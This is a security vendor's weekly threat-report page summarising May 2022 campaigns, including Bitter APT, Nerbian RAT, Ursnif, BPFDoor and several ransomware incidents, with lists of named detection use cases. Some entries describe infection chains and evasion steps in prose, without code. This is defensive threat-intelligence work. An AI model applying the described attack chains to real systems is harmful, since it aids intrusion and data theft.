The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

Increased Threats to Managed Service Providers

May 17, 2022

Increased Threats to Managed Service Providers

Industry: Technology | Level: Strategic | Source: CISA

A warning was issued to managed service providers (MSPs) by Five Eyes, a collective intelligence alliance from the United States, United Kingdom, Australia, Canada, and New Zealand. As stated in the advisory, “Whether the customer’s network environment is on-premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects. The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities expect malicious cyber actors—including state-sponsored advanced persistent threat (APT) groups—to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships. For example, threat actors successfully compromising an MSP could enable follow-on activity—such as ransomware and cyber espionage—against the MSP as well as across the MSP’s customer base.” The intelligence agencies have not provided any specific targets, only mentioning reports of an increase in cyber activity against MSPs. Recommendations provided by the agencies urge hardening defenses including reinforcing public-facing applications, enabling and improving logging, implementing MFA, segregating networks, utilizing the principle of least privilege, ensuring obsoleted accounts and systems are deprecated, updating systems, and creating regular backups of data.

Operation CuckooBees

May 17, 2022

Operation CuckooBees

Industry: Aerospace, Biotechnology, Defense, Energy, Pharmaceuticals | Level: Strategic | Source: Cybereason

Cybereason conducted a 12-month investigation named Operation CuckooBees, researching a sophisticated global cyber espionage campaign stealing intellectual property. The campaign is considered to be attributed to the Chinese state-sponsored APT group, Winnti. Industries impacted are identified as Aerospace, Biotechnology, Defense, Energy, and Pharmaceuticals. Geographical impact was found in North America, Europe, and Asia. Cybereason has identified many companies as never reveling a breach and evidencing pointing to a longer campaign, stemming as far back as 2019. The business impact of intellectual property theft is not as immediate as threats like ransomware, DDoS, and others however, the market and financial impact is a long game. Company investment in research and development (R&D) efforts can’t be recouped and competition becomes more difficult if they’re competing against their own product. Many common means of exploits are pointed to as the cause of compromise to organizations such as “unpatched systems, insufficient network segmentation, unmanaged assets, forgotten accounts, and a lack of multi-factor authentication.” Despite a representative from the Chinese Embassy denying Chinese involvement in cyberattacks, it is likely untrue coming from a nation-state actor.

Ransomware Forces Closure of Lincoln College

May 17, 2022

After 157 years of academic services in Illinois, liberal-arts school, Lincoln College will be ceasing operations and closing after the spring semester on May 13th, 2022.

German Automotive Sector Targeted with Info-Stealer Campaign

May 17, 2022

German Automotive Sector Targeted with Info-Stealer Campaign

Industry: Automotive | Level: Tactical | Source: CheckPoint

A threat operation, discovered by Check Point, identified information-stealing malware targeting 14 German organizations, primarily those in the automotive industry including dealerships and manufacturers. The campaign was tracked back to at least July 2021. German automotive businesses were used for the disguise of this campaign, with the attackers hosting domains imitating the businesses to distribute emails and host malware. The phishing email contains an ISO file to bypass NTFS Mark-of-the-Web trust control (MOTW) with an HTA within. The HTA file then spawns Mshta.exe with either VBScript or PowerShell being executed to download additional payloads or to modify the registry. Payload delivered would include various information-stealing malware such as Raccoon, AZORult, and BitRAT. Information compromised would include personal, and credit card information. The attribution of the campaign is currently unclear, hosted infrastructure was identified in Iran, but doesn’t provide any definitive evidence of attribution. Additionally, the attacker’s exact motives remain undetermined, despite obtaining personal and financial information, a larger play of espionage or business fraud is a potential.

Anvilogic Scenario:

  • Malicious Document Delivering Malware

Anvilogic Use Cases:

  • MSHTA.exe execution
  • BITSadmin Execution
  • Modify Registry Key
  • Invoke-WebRequest Command
  • Output to File

Bitter APT Targets Bangladesh

May 17, 2022

Bitter APT Targets Bangladesh

Industry: N/A | Level: Tactical | Source: CiscoTalos

Cisco Talos found threat activity from Bitter APT group targeting the Bangladesh government dating back to August 2021. Historically the threat group has targeted Asian entities in China, Pakistan, and Saudi Arabia, making the shift to Bangladesh new. The campaign is initiated through spear-phishing masquerading as “regular operational tasks” with emails containing a malicious Word document to abuse Microsoft vulnerabilities, such as Equation Editor, CVE-2017-11882. Software used to send emails include Zimbra and JavaMail. An embedded object in the weaponized Excel document configures a scheduled task. Once initial access is obtained the threat actor’s trojan, named “ZxxZ” by Cisco Talos, is deployed providing capabilities such as remote code execution, disguising itself as a Windows Security update. System information discovery is initiated along with identifying defensive tools such as Windows Defender or known antivirus software. The group’s main objective is to conduct cyber espionage.

Anvilogic Scenario:

  • Bitter APT – Infection Chain with Equation Editor

Anvilogic Use Cases:

  • Abuse EQNEDT32.EXE CVE-2017-11882
  • Create/Modify Schtasks
  • Executable File Written to Disk
  • Invoke-WebRequest Command
  • Query Registry
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Remote Thread from Suspicious Folder

Phishing with World Health Organization Themes

May 17, 2022

Phishing with World Health Organization Themes

Industry: N/A | Level: Tactical | Source: ProofPoint

Research from ProofPoint has identified the distribution of Nerbian remote access trojan (RAT), through phishing emails using COVID-19 and World Health Organization themes. The threat campaign was traced back to getting its start April 26th, 2022, with emails targeting entities located in Italy, Spain, and the United Kingdom. Emails delivered contain either a malicious document or a compressed archive containing a malicious document. The process flow upon the execution of the embedded macro is, CMD calls PowerShell to download a BAT file, the BAT file launches the PowerShell to download additional payloads including the malicious RAT. The RAT establishes persistence and has the capabilities to download additional payloads as needed. There is currently no attribution placed on the Nerbian RAT.

Anvilogic Scenario:

  • Nerbian RAT Infection Chain from Malicious Document

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Suspicious Executable by CMD.exe
  • Executable Create Script Process
  • Invoke-WebRequest Command
  • Executable File Written to Disk
  • Suspicious Executable by Powershell
  • Executable Process from Suspicious Folder
  • Network Connection with Suspicious Folder
  • Create/Modify Schtasks

 

Ursnif Phishing Campaigns

May 17, 2022

Ursnif Phishing Campaigns

Industry: Financial, Government | Level: Tactical | Source: Qualys

Analysis of banking malware, Ursnif has been reviewed by Qualys. The information-stealing malware, with capabilities to steal credentials, keylogging, and download additional payloads, has been a prevalent threat since 2020. Ursnif is predominantly distributed through phishing emails targeting verticles in banking, financial services, and government agencies. In the latest stream of phishing campaigns, attackers are leveraging current events and impersonating government authorities to lure victims. Malicious attachments for the email either contain an Excel document or a zip attachment, the infection chain for both scenarios is slightly different, but the result is the same. In the Excel infection scenario, a binary is downloaded upon execution of the Excel macro. The binary spoofs the parent PID to explorer.exe for defense evasion. In the zip attachment scenario, an HTA file is attached and when triggered launched PowerShell to download a DLL file to be executed with rundll32.

Anvilogic Scenario:

  • Malicious Document Delivering Malware

Anvilogic Use Cases:

  • Malicious Document Execution
  • Compressed File Execution
  • Invoke-Expression Command
  • MSHTA.exe execution
  • Query Registry
  • Rundll32 Command Line

Linux Backdoor, BPFDoor

May 17, 2022

Linux Backdoor, BPFDoor

Industry: Education, Government, Logistics, Telecommunications | Level: Tactical| Source: SandFlySecurity

BPFDoor, an evasive Linux backdoor, to be utilized by Chinese Red Menshen threat actors. has been researched by Kevin Beaumont, PricewaterhouseCoopers (PwC), and The Sandfly Security Team.  The stealth capabilities of the tool make it ideal for espionage and persistent attacks. Utilizing the Berkeley Packet Filter sniffer, BPFDoor is capable of monitoring network traffic and sending network packets. Operating at the network layer level, the malware is unhindered by firewall rules and does not require any open ports. The malware once downloaded, requires root permissions for execution and will be set up as an in-memory implant. Persistence for the malware is set up with scripts or a crontab scheduled task. Attackers are able to control the implant once the backdoor modifies firewall configurations, “Upon receiving a special packet, it will modify the local firewall to allow the attacker IP address to access resources such as a spawned shell or connect back bindshell.” Additionally, attackers are able to control the implant through a “magic” password as identified by security researcher Kevin Beaumont. Targets by Red Menshen are organizations in verticals for education, government, logistics, and telecommunication. Geographically targets are in Asia and the Middle East.

Anvilogic Scenario:

  • Unix File Download, Modified, Executed

Anvilogic Use Cases:

  • Linux Malware – BPFDoor
  • Sudoers Misconfiguration PrivEsc
  • Crontab Job Scheduling (Unix)
  • File Download (Unix)
  • File Modified for Execution
  • File Execution (Unix)

Quantum Ransomware Analyzed by Cybereason

May 17, 2022

Cybereason has been analyzing Quantum ransomware, a rebrand of various ransomware starting with Mount Locker (September 2020) to Astro Locker (March 2021) and Xing Locker (May 2021).

AGCO, Farming and Equipment Maker Hits By Ransomware

May 10, 2022

AGCO, Farming and Equipment Maker Hits By Ransomware

Industry: Agricultural | Level: Strategic | Source: AgcoCorp

A ransomware attack impacted AGCO, an agricultural equipment manufacturer and distributor, on May 5th, 2022. AGCO provided a statement regarding the incident, expecting operations to be impacted by the attack requiring “Several days and potentially longer to fully resume all services depending upon how quickly the Company is able to repair its systems.” No details are mentioned regarding the ransomware strain that has impacted the company.